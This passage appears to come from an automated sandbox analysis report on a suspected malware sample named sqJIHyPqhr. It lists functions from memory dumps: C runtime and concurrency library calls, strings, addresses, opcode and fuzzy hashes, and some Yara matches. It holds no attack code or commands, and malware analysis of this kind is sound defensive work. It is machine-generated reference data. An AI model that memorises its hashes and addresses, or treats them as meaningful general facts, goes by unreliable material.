_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

pow, xrefs: 0043EFA9, 0043F055, 0043F068
log, xrefs: 0043EF6B, 0043EF77
log10, xrefs: 0043EF0F, 0043EF5F
asin, xrefs: 0043F031
acos, xrefs: 0043F03D
sqrt, xrefs: 0043F049
exp, xrefs: 0043EF8A, 0043EFEC

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 024D3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 1609fa7863bffdc7a6b1b616fe6d56ae7ac17a1dcbcf0e8ee8e2630e84b7099b
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 88C1C374E04249AFDF11DFA9C864BAEBFB1AF0A314F1441DAE414AB391C774A941CF62

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

fB, xrefs: 004287AE, 004287B7, 004287C8
csm, xrefs: 004287A6

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 024BC6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 024BC6DC
atomic_compare_exchange.LIBCONCRT ref: 024BC700
std::_Cnd_initX.LIBCPMT ref: 024BC711
std::_Cnd_initX.LIBCPMT ref: 024BC71F

Part of subcall function 024A1370: __Mtx_unlock.LIBCPMT ref: 024A1377

std::_Cnd_initX.LIBCPMT ref: 024BC72F

Part of subcall function 024BC3EF: __Cnd_broadcast.LIBCPMT ref: 024BC3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024BC73D

Strings

t#D, xrefs: 024BC6C2

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: acce132dbf25cdd8ec706ff4b7ca29d13aa24df6e014fd855d7064df9005ee6e
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 8B01F771900605ABDB12BB66CDC4BDEB35AAF04310F14001BE90597680DBB4EA158FA2

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 024D1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

_free.LIBCMT ref: 024D1444
_free.LIBCMT ref: 024D145D
_free.LIBCMT ref: 024D148F
_free.LIBCMT ref: 024D1498
_free.LIBCMT ref: 024D14A4

Strings

C, xrefs: 024D1291

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: c86c8648aada7789ed40359bdd35dab84400f3d1f4258a12614e4e455f562939
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 97B12775A012199FDB24DF19C894BAEB7B5FB08704F1486AEE84DA7350D771AE90CF40

Function 024DA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024DA184
_free.LIBCMT ref: 024DA192
_free.LIBCMT ref: 024DA2C0
_free.LIBCMT ref: 024DA2CB

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 88b06bfc0f62aa8935fa323e363d542e538bb6ec90b14b7fccbc0ee81c7f4c38
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 3261D271900215AFDB20CFAAC851B9EBBF6EF45710F2441ABE844EB341D771A981CF51

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 024D3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,024CC4A4,E0830C40,?,?,?,?,?,?,024D425F,024AE03C,024CC4A4,?,024CC4A4,024CC4A4,024AE03C), ref: 024D3B2C
__fassign.LIBCMT ref: 024D3BA7
__fassign.LIBCMT ref: 024D3BC2
WideCharToMultiByte.KERNEL32(?,00000000,024CC4A4,00000001,?,00000005,00000000,00000000), ref: 024D3BE8
WriteFile.KERNEL32(?,?,00000000,024D425F,00000000,?,?,?,?,?,?,?,?,?,024D425F,024AE03C), ref: 024D3C07
WriteFile.KERNEL32(?,024AE03C,00000001,024D425F,00000000,?,?,?,?,?,?,?,?,?,024D425F,024AE03C), ref: 024D3C40

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 9b1e56b38bda6480e825d8161c508a333082f189903fcd540619dd84be33695c
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: F651E375A00208AFDB10CFA8D894AEEBBF4EF09704F1445AFE545E7291D7309A81CF61

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 024C4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024C4ACD

Part of subcall function 024C4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024C4800), ref: 024C4DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024C4AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024C4AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 024C4AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024C4B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024C4BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 024C4BC3

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 0875ea5048e981624fad59838c0fe59fe388e1fa9d677430487d7972d671a114
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 3131C43DA002149BCF45EF6DC9A1B6E73B6BF44310F30456ED92597381EB70EA01CA94

Function 024DFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: b9815d60f90e03f406f23d24981ab284aeb63e4d6947556696c8ee02ca3ea9ae
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: AD11B475604115BBDB312F7ADC58A6B7AADEF82B61B110A2FFC16C7250DB308855CAB0

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 024DA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024DA331: _free.LIBCMT ref: 024DA35A

_free.LIBCMT ref: 024DA638

Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9

_free.LIBCMT ref: 024DA643
_free.LIBCMT ref: 024DA64E
_free.LIBCMT ref: 024DA6A2
_free.LIBCMT ref: 024DA6AD
_free.LIBCMT ref: 024DA6B8
_free.LIBCMT ref: 024DA6C3

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 1e2290a96dfed7973839b9a09976dd47159d8499feb778fb7522d2736dd6660c
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 49115171644B14ABDE30BBB3CC65FCF7B9FDF01B00F40082EA299AA190DAA5B5148E51

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 024B2659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B2667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B26A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024B0DA0,?,?,?,00000000), ref: 024B26B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B26CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024B26DA

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: dd7eb2b33ecf06007c0eae1226634b754f84f9ecfd3c2023df9df350be9f62d9
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: A601A739501115A7D722FF76EC49FEF3768AF42F52B50082BF805D2160DBA4D9048AB8

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 024B24A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024B670B), ref: 024B24B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024B24C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024B24D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024B670B), ref: 024B2500
GetProcAddress.KERNEL32(00000000), ref: 024B2507
GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B2522
GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2544
__CxxThrowException@8.LIBVCRUNTIME ref: 024B2552

Strings

kernel32.dll, xrefs: 024B24B0, 024B24B5, 024B24FA

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: c6546b899ecf4e53be239df79c363e2d26ac8b115e56616000b25bd2ce47c9e5
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 8CF0A9759003103FFB127B757C5995B3FADDD4AA23320063BF811E2291EBB9D5418578

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::failbit set, xrefs: 0040C644
F(@, xrefs: 0040C651
F(@, xrefs: 0040C61B
ios_base::eofbit set, xrefs: 0040C649

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

